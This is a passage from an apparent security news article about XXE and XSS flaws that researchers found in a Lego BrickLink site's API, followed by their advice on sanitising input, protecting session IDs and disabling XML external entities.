The vulnerability was present due to how the site's XML parser uses XML External Entities, a part of the XML standard that defines a concept called an entity, or a storage unit of some type, Yodev explained in the post. In the case of the BrickLinks page, the implementation was vulnerable to a condition in which the XML processor may disclose confidential information that's typically not accessible by the application, he wrote.

Researchers exploited the flaw to mount an XXE injection attack that allows a system-file read with the permissions of the running user. This type of attack also can allow for an additional attack vector using server-side request forgery, which might enable an attacker to gain credentials for an application running on Amazon Web Services and thus breach an internal network, the researchers said.

**Avoiding Similar API Flaws**

Researchers shared some advice to help enterprises avoid creating similar API issues that can be exploited on Internet-facing applications in their own environments.

In the case of API vulnerabilities, attackers can inflict the most damage if they combine attacks on various issues or conduct them in quick succession, Yodev wrote, something the researchers demonstrated is the case with the Lego flaws.

To avoid the scenario created with the XSS flaw, organizations should follow the rule of thumb "to never trust user input," Yodev wrote. "Input should be properly sanitized and escaped," he added, referring organizations to the XSS Prevention Cheat Sheet by the Open Web Application Security Project (OWASP) for more information on this topic.

Organizations also should be careful in their implementation of session ID on Web-facing sites because it's "a common target for hackers," who can leverage it for session hijacking and account takeover, Yodev wrote.

"It is important to be very careful when handling it and not expose or misuse it for other purposes," he explained.

Finally, the easiest way to stop XXE injection attacks like the one researchers demonstrated is to completely disable External Entities in your XML parser’s configuration, the researchers said. The OWASP has another useful resource called the XXE Prevention Cheat Sheet that can guide organizations in this task, they added.

Tag

#mac